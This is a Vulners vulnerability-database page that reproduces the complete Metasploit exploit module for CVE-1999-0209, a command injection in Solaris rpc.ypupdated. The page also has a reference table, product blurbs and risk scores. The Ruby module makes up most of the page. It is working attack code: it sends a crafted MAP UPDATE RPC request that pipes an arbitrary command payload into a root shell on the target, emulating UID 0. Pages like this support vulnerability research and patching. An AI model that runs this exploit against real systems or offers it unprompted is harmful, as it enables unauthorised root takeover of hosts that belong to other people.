Vulners
Lucene search
Solaris - ypupdated Command Execution (Metasploit)
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta) | 4 Apr 200800:00 | – | zdt |
 | CVE-1999-0209 | 4 Apr 200800:00 | – | circl |
 | CVE-1999-0209 | 29 Sep 199904:00 | – | cve |
 | CVE-1999-0209 | 29 Sep 199904:00 | – | cvelist |
 | Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit) | 4 Apr 200800:00 | – | exploitdb |
 | Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit) | 4 Apr 200800:00 | – | exploitpack |
 | Solaris ypupdated Command Execution | 18 Apr 200801:33 | – | metasploit |
 | CVE-1999-0209 | 14 Aug 199004:00 | – | nvd |
 | CAU-EX-2008-0001.txt | 8 Apr 200800:00 | – | packetstorm |
| Solaris ypupdated Command Execution | 28 Oct 200900:00 | – | packetstorm |
10
##
# $Id: ypupdated_exec.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris ypupdated Command Execution',
'Description' => %q{
This exploit targets a weakness in the way the ypupdated RPC
application uses the command shell when handling a MAP UPDATE
request. Extra commands may be launched through this command
shell, which runs as root on the remote host, by passing
commands in the format '|<command>'.
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
ypupdated is started with the '-i' command-line option.
},
'Author' => [ 'I)ruid <[email protected]>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9929 $',
'References' =>
[
['CVE', '1999-0209'],
['OSVDB', '11517'],
['BID', '1749'],
],
'Privileged' => true,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 12 1994'
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
hostname = datastore['HOSTNAME']
program = 100028
progver = 1
procedure = 1
print_status('Sending PortMap request for ypupdated program')
pport = sunrpc_create('udp', program, progver)
print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")
print_status('Waiting for response...')
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
print_status('No Errors, appears to have succeeded!')
rescue ::Rex::Proto::SunRPC::RPCTimeout
print_error('Warning: ' + $!)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jul 2010 00:00Current
7High risk
Vulners AI Score7
CVSS 25
EPSS0.42373